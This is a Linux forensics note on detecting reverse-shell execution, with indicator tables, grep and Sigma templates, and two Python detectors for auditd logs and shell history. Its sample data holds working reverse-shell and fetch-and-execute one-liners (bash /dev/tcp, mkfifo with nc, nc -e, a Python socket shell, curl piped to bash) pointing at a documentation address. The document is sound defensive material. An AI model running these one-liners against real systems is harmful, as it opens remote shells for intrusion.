This note documents detection patterns related to Reverse Shell Execution on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | bash -i | Interactive bash invocation | Critical | Classic reverse shell pattern when combined with /dev/tcp or socket redirection. |
| Shell history | /dev/tcp/ | Bash TCP socket shell | Critical | Very common manual shell technique; needs no extra tooling on the host. |
| Shell history | nc -e | Netcat command execution shell | Critical | High-confidence indicator; absent from some netcat builds (e.g. netcat-openbsd), so also check for the mkfifo variant. |
| Shell history | mkfifo | FIFO shell construction | Critical | Used when nc lacks -e: a named pipe glues nc to /bin/sh. |
| Shell history | python -c | Python inline reverse shell | Critical | Frequently used on Linux targets; noisy on its own, so pair it with socket/connect/dup2 strings. |
| Shell history | perl -e | Perl reverse shell | High | Common on legacy systems. |
| Shell history | php -r | PHP shell execution | High | Often seen after web compromise. |
| Shell history | `curl \| bash` | Remote payload piped to a shell | Critical | Fetch-and-execute delivery chain. |
| Shell history | wget -O- | Inline payload execution | Critical | Common delivery chain, typically piped to sh or bash. |
| auditd | execve of shell with socket utilities | Process execution evidence | Critical | Best attribution if execve auditing is enabled. |
| auth.log / secure | shell after SSH or sudo | Reverse shell launched post-access | High | Correlate with the session window. |
| journalctl | suspicious shell invocation | Journald process visibility | High | Depends on logging config. |
| Network telemetry | outbound connection to uncommon IP | Reverse callback | Critical | Strong network confirmation. |
| ss / netstat remnants | established outbound socket | Live shell evidence | Critical | Especially useful in live response. |
| EDR telemetry | shell parent-child anomaly | Process lineage | Critical | Detects shell spawned by web/app process. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Shell launched immediately after web request | Web exploitation pivot | Critical | Common webshell-to-reverse-shell sequence. |
| Shell spawned by unusual parent | apache, nginx, www-data, tomcat | Critical | Strong exploitation signal. |
| Outbound connection to rare external host | Unexpected callback target | Critical | High-value beacon clue. |
| Reverse shell followed by user creation | Stabilization after foothold | Critical | Common attacker progression. |
| Reverse shell followed by sudo | Immediate escalation | Critical | Strong intrusion chain. |
| Temporary file then shell | Payload staging in /tmp, /dev/shm | High | Common staging behavior. |
| One-line interpreter execution | Minimal footprint shell | High | Suggests hands-on operator. |
| Connection on uncommon high port | Ad hoc callback | High | Often operator-controlled listener. |
| Short-lived shell bursts | Interactive operator reconnects | High | Common unstable shell behavior. |
| No shell history but network evidence | Non-interactive execution | High | Possible web or cron context. |
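The two lineage rows above (shell launched after a web request, shell spawned by apache, nginx, www-data or tomcat) are best answered from auditd execve records, because auditd logs pid, ppid, uid and the full argv of every exec. The block below is an added example and not part of the original note: it merges SYSCALL and EXECVE records by audit serial, recovers the parent's comm from earlier exec events in the same window, decodes hex-encoded argv elements, and flags shells by parent, owning uid and command-line syntax. The audit lines, the web-parent set and the service uid list (33 for www-data on Debian/Ubuntu, 48 for apache on RHEL) are assumptions made for the example.

```python
import re
from collections import defaultdict

# Parent processes from which a shell exec is rarely legitimate, and the
# interpreters/shells we care about. Both sets are assumptions; extend per fleet.
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "tomcat", "java", "node", "gunicorn"}
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "php", "nc", "ncat", "socat"}
SERVICE_UIDS = {"33", "48"}  # www-data (Debian/Ubuntu), apache (RHEL); assumed for this host
REVSHELL_SYNTAX = re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s|socket\.|mkfifo|pty\.spawn")

REC_RE = re.compile(r"type=(\w+) msg=audit\(([\d.]+):(\d+)\): (.*)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def decode_arg(raw: str) -> str:
    """EXECVE argv elements are quoted when printable; auditd hex-encodes the rest."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if len(raw) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw

def parse_events(lines):
    """Merge SYSCALL and EXECVE records that share an audit serial into one event."""
    events = defaultdict(dict)
    for line in lines:
        m = REC_RE.match(line.strip())
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        ev = events[serial]
        ev["serial"], ev["ts"] = serial, float(ts)
        fields = dict(KV_RE.findall(body))
        if rtype == "SYSCALL":
            for k in ("pid", "ppid", "uid", "comm", "exe"):
                if k in fields:
                    ev[k] = fields[k].strip('"')
        elif rtype == "EXECVE":
            argc = int(fields.get("argc", "0"))
            ev["argv"] = [decode_arg(fields[f"a{i}"]) for i in range(argc) if f"a{i}" in fields]
    return [events[s] for s in sorted(events, key=int)]

def find_suspicious_shells(lines):
    """Flag shell execs by parent comm, owning uid and command-line syntax."""
    comm_by_pid = {}   # pid -> comm, learned from earlier exec events in the window
    findings = []
    for ev in parse_events(lines):
        if "comm" not in ev:
            continue
        # ppid lookup only works if the parent itself exec'd inside the log window;
        # otherwise it is reported as unknown rather than guessed.
        parent = comm_by_pid.get(ev.get("ppid"), "unknown")
        comm_by_pid[ev["pid"]] = ev["comm"]
        if ev["comm"] not in SHELLS:
            continue
        cmd = " ".join(ev.get("argv", []))
        reasons = []
        if parent in WEB_PARENTS:
            reasons.append(f"parent={parent}")
        if ev.get("uid") in SERVICE_UIDS:
            reasons.append(f"uid={ev['uid']}")
        if REVSHELL_SYNTAX.search(cmd):
            reasons.append("revshell-syntax")
        if reasons:
            findings.append({"serial": ev["serial"], "pid": ev["pid"], "parent": parent,
                             "uid": ev.get("uid"), "cmd": cmd, "reasons": reasons})
    return findings

# Constructed audit.log excerpt (fields trimmed to those the parser reads; not a real capture).
# The payload argument is written in auditd's hex form so decode_arg is exercised.
PAYLOAD = "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"
SAMPLE_AUDIT = f"""
type=SYSCALL msg=audit(1700000000.101:2001): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=1234 auid=4294967295 uid=33 gid=33 euid=33 tty=(none) comm="apache2" exe="/usr/sbin/apache2" key="exec"
type=EXECVE msg=audit(1700000000.101:2001): argc=3 a0="/usr/sbin/apache2" a1="-k" a2="start"
type=SYSCALL msg=audit(1700000000.202:2002): arch=c000003e syscall=59 success=yes exit=0 ppid=1234 pid=1250 auid=4294967295 uid=33 gid=33 euid=33 tty=(none) comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1700000000.202:2002): argc=3 a0="sh" a1="-c" a2={PAYLOAD.encode().hex()}
type=SYSCALL msg=audit(1700000000.203:2003): arch=c000003e syscall=59 success=yes exit=0 ppid=1250 pid=1251 auid=4294967295 uid=33 gid=33 euid=33 tty=(none) comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000000.203:2003): argc=2 a0="bash" a1="-i"
type=SYSCALL msg=audit(1700000000.301:2004): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=900 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) comm="sshd" exe="/usr/sbin/sshd" key="exec"
type=SYSCALL msg=audit(1700000000.302:2005): arch=c000003e syscall=59 success=yes exit=0 ppid=900 pid=910 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000000.302:2005): argc=1 a0="-bash"
type=SYSCALL msg=audit(1700000000.401:2006): arch=c000003e syscall=59 success=yes exit=0 ppid=650 pid=700 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1700000000.401:2006): argc=3 a0="/bin/sh" a1="-c" a2="/usr/sbin/logrotate /etc/logrotate.conf"
""".strip().splitlines()

if __name__ == "__main__":
    for f in find_suspicious_shells(SAMPLE_AUDIT):
        print(f"{f['serial']} pid={f['pid']} parent={f['parent']} uid={f['uid']} "
              f"[{', '.join(f['reasons'])}] {f['cmd']}")
```

Run against the sample, the `sh -c` spawned by apache2 as uid 33 with /dev/tcp syntax is reported with all three reasons, the interactive bash it spawns is reported on uid alone, the sshd-spawned user bash and the cron-style `sh -c logrotate` are not reported. The ppid lookup has a known blind spot: a child that was forked but never exec'd keeps its parent's comm and never appears as its own exec event, so a parent outside the log window is shown as unknown and still deserves a `ps auxf` check on the pid.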
Common Tools
| Tool | Usage |
|---|---|
| bash | Native /dev/tcp shell redirection; no extra binary needed. |
| nc / netcat | Socket-based shell delivery. |
| socat | Advanced interactive reverse shell (full tty). |
| python | Inline socket shell creation. |
| perl | Legacy inline reverse shell. |
| php | Common post-web compromise shell. |
| openssl s_client | TLS shell tunneling. |
| curl / wget | Payload fetch then execute. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary command evidence. |
| Audit logs | /var/log/audit/audit.log | Critical | Process-level execution. |
| Auth logs | /var/log/auth.log, /var/log/secure | High | Session context before shell. |
| Journald | journalctl | High | Process clues on some systems. |
| Network sockets | ss -tunap, netstat -tunap | Critical | Live callback evidence. |
| Temporary directories | /tmp, /var/tmp, /dev/shm | Critical | Stagers often remain here. |
| Web roots | /var/www, app dirs | High | Reverse shell may originate from web foothold. |
| Process tree | ps auxf | Critical | Parent-child shell lineage. |
| File timestamps | stat on payload files | High | Timeline anchor. |
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1059.004 Unix Shell
- T1105 Ingress Tool Transfer
- T1071 Application Layer Protocol
Decision Tree
- Is shell syntax present?
  - Search for known reverse shell strings.
- Which interpreter launched it?
  - Bash, python, perl, php, nc, socat.
- Which parent process exists?
  - SSH, sudo, web server, cron, systemd.
- Was an outbound connection created?
  - Identify destination IP and port.
- Did the shell lead to persistence?
  - Inspect users, keys, cron, services.
- Pivot
  - Parent process → intrusion source.
  - Destination IP → operator infra.
  - Payload file → staging path.
- Confirm shell
  - Shell syntax + outbound socket + suspicious parent = high-confidence reverse shell.
Example Detection Templates
Grep
```bash
# Reverse shell syntax in histories and staging dirs (-r descends into dotfiles such as .bash_history)
grep -rE '\b(bash|sh) -i\b|/dev/tcp/|\b(nc|ncat)\b.* -e |mkfifo|python[23]? -c|perl -e|php -r' /home /root /tmp /var/tmp 2>/dev/null
# Fetch-and-execute chains and socat transports
grep -rE '\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b|wget -q?O-|socat' /home /root /tmp /var/tmp 2>/dev/null
# Shell histories only, with the owning file named on each hit
grep -H 'bash -i' /home/*/.bash_history /home/*/.zsh_history /root/.bash_history /root/.zsh_history 2>/dev/null
```

`python -c`, `mkfifo` and `bash -i` on their own are common in administrative use; treat a hit as a lead to correlate with the parent process and network evidence, not as a verdict.
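The patterns in the Direct Indicators table and the grep templates above match single strings, and several of them are ordinary in admin use. The following is an added example, not part of the original note: it scores each history line by co-occurrence of indicators so that an interpreter flag only reaches alert level alongside a socket, FIFO-to-netcat or redirection term on the same line. The history lines, the rule set and the weights are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample history lines; not taken from any real incident.
SAMPLE_HISTORY = [
    "ls -la /var/www/html",
    "python3 -c 'import sys; print(sys.version)'",
    "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1",
    "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.7 4444 > /tmp/f",
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.7\",4444));"
    "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")'",
    "curl -s http://203.0.113.7/x.sh | bash",
    "nc -e /bin/sh 203.0.113.7 4444",
    "sudo systemctl restart nginx",
]

# (name, regex, weight). Weights are illustrative assumptions. Bare interpreter
# flags and mkfifo score low on their own; network terms score high, so a line
# only crosses the threshold when an execution primitive meets a socket.
RULES = [
    ("bash_interactive", re.compile(r"\b(bash|sh)\s+-i\b"), 2),
    ("dev_tcp",          re.compile(r"/dev/(tcp|udp)/"), 4),
    ("nc_exec",          re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), 4),
    ("mkfifo",           re.compile(r"\bmkfifo\b"), 1),
    ("fifo_to_nc",       re.compile(r"\bmkfifo\b.*\|\s*(nc|ncat|netcat)\b"), 4),
    ("interp_inline",    re.compile(r"\b(python[23]?|perl|php|ruby)\s+-(c|e|r)\b"), 1),
    ("socket_api",       re.compile(r"socket\.|connect\(|dup2\(|pty\.spawn|IO::Socket|fsockopen"), 3),
    ("fetch_exec",       re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), 4),
    ("stdio_redirect",   re.compile(r"0>&1|2>&1|>&\s*/dev"), 1),
]

@dataclass
class Finding:
    line: str
    score: int
    hits: list = field(default_factory=list)

def score_line(line: str) -> Finding:
    """Sum the weights of every rule that matches this history line."""
    hits = [name for name, rx, _ in RULES if rx.search(line)]
    score = sum(w for name, _, w in RULES if name in hits)
    return Finding(line, score, hits)

def scan_history(lines, threshold: int = 4):
    """Return findings at or above the threshold, highest score first."""
    findings = (score_line(line) for line in lines)
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{f.score:2d}  {','.join(f.hits):<45} {f.line[:60]}")
```

On the sample, the harmless `python3 -c 'import sys; ...'` scores 1 and is dropped, while the mkfifo pipeline (8) and the /dev/tcp one-liner (7) top the list; the Python socket shell reaches the threshold only because the interpreter flag and the socket API calls appear together.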
Journalctl
```bash
journalctl --no-pager -o short-iso | grep -E '\b(bash|sh) -i\b|/dev/tcp/|\b(nc|ncat)\b.* -e |mkfifo|socat'
```

A bare `nc` substring also matches words such as "sync", hence the word boundaries. Journald only carries what services hand to it (sudo, systemd units, forwarded audit messages), so an empty result does not rule a shell out.
Network Inspection
```bash
ss -tunap                    # all TCP/UDP sockets with owning process; -p shows other users' processes only as root
ss -tnp state established    # only live TCP sessions, which is where an active callback appears
netstat -tunap               # legacy equivalent on hosts without iproute2
```
Sigma
```yaml
title: Linux Reverse Shell Execution Indicators
id: linux-reverse-shell-execution
status: experimental
description: Detects common reverse shell syntax and suspicious shell execution indicators
logsource:
  product: linux
detection:
  selection_keywords:
    message|contains:
      - 'bash -i'
      - '/dev/tcp'
      - 'nc -e'
      - 'mkfifo'
      - 'python -c'
  condition: selection_keywords
fields:
  - message
  - hostname
falsepositives:
  - Rare admin troubleshooting
level: high
tags:
  - attack.execution
  - attack.t1059.004
```

The Sigma specification expects `id` to be a UUID; replace the placeholder before converting the rule. `mkfifo` and `python -c` alone will fire on routine administration, so either require co-occurrence with `/dev/tcp`, `nc -e` or a socket call, or route those two keywords to a lower level.
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Egress filtering | Restrict outbound arbitrary connections | Critical | Stops callback channels. |
| Shell monitoring | Alert on shell spawned by service accounts | Critical | High-signal detection. |
| Auditd | Track execve and network-linked shell activity | High | Strong attribution. |
| Least privilege | Restrict interpreters for service users | High | Reduces shell options. |
| Web hardening | Prevent shell execution from app context | Critical | Major web compromise barrier. |
| Temp monitoring | Watch /tmp, /dev/shm, /var/tmp | High | Common staging zones. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was shell syntax executed? | grep histories | Immediate confirmation. |
| Which parent process launched shell? | ps auxf | Determines intrusion source. |
| Is callback still active? | ss -tunap | Live shell detection. |
| Did shell touch temp files? | inspect temp dirs | Staging clue. |
| Was sudo used after shell? | grep sudo logs | Escalation chain. |
| Did persistence follow? | inspect keys, cron, users | Stabilization evidence. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
| bash -i | Classic reverse shell. |
| /dev/tcp | Bash socket shell. |
| nc -e | Netcat shell. |
| mkfifo | FIFO shell pattern. |
| python -c | Inline interpreter shell. |
| perl -e | Perl shell. |
| php -r | PHP shell. |
| `curl \| bash` | Remote fetch-execute. |
| wget -O- | Inline fetch-execute. |
| socat | Advanced shell transport. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Shell from web process | Likely exploitation chain. |
| Shell after SSH success | Operator moved from stable foothold into callback tooling. |
| Shell plus temp payload | Staged execution highly likely. |
| Outbound connection to rare IP | Strong callback evidence. |
| Reverse shell without history | Non-interactive context or cleanup likely. |
| Multiple shell syntaxes present | Operator fallback attempts. |